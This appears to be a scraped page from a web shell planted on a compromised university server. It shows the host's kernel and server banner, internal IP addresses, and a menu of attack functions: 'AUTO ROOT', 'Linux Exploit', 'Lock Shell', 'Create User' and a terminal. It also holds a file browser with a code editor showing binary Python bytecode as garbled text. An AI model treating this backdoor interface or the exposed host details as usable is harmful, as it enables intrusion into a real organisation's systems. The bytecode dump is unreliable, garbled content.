Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
xdg /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
BaseDirectory.cpython-310.pyc
5.19
KB
-rw-r--r--
Config.cpython-310.pyc
1.16
KB
-rw-r--r--
DesktopEntry.cpython-310.pyc
16.02
KB
-rw-r--r--
Exceptions.cpython-310.pyc
3.43
KB
-rw-r--r--
IconTheme.cpython-310.pyc
12.58
KB
-rw-r--r--
IniFile.cpython-310.pyc
9.45
KB
-rw-r--r--
__init__.cpython-310.pyc
1.64
KB
-rw-r--r--
Locale.cpython-310.pyc
1.58
KB
-rw-r--r--
Menu.cpython-310.pyc
27.83
KB
-rw-r--r--
MenuEditor.cpython-310.pyc
13.41
KB
-rw-r--r--
Mime.cpython-310.pyc
22.68
KB
-rw-r--r--
RecentFiles.cpython-310.pyc
5.39
KB
-rw-r--r--
util.cpython-310.pyc
1.93
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Menu.cpython-310.pyc
o ��_�� � @ s� d Z ddlZddlZddlZddlZddlZzddlm mZ W n e y3 ddl m mZ Y nw ddlm Z mZ ddlmZ ddlmZ ddlmZ ddlZddlZdd� Zd d � ZdZdZd ZdZdZdZG dd� d�Z G dd� d�Z!G dd� d�Z"G dd� d�Z#G dd� d�Z$G dd� d�Z%G dd� d�Z&d\Z'Z(d d!� Z)d"d#� Z*d$d%� Z+d&d'� Z,G d(d)� d)e-�Z.G d*d+� d+�Z/d/d-d.�Z0dS )0a� Implementation of the XDG Menu Specification http://standards.freedesktop.org/menu-spec/ Example code: from xdg.Menu import parse, Menu, MenuEntry def print_menu(menu, tab=0): for submenu in menu.Entries: if isinstance(submenu, Menu): print (" " * tab) + unicode(submenu) print_menu(submenu, tab+1) elif isinstance(submenu, MenuEntry): print (" " * tab) + unicode(submenu.DesktopEntry) print_menu(parse()) � N)� xdg_data_dirs�xdg_config_dirs)�DesktopEntry)�ParsingError)�PY3c C sD t jdkrt�| �} t jdkrt�| �S t�| �S tj| t�� d�S )N)� � )r � ��id�ctx)�sys�version_info�ast�literal_eval�Constant�NameConstant�Name�Load)�name� r �*/usr/lib/python3/dist-packages/xdg/Menu.py� _ast_const'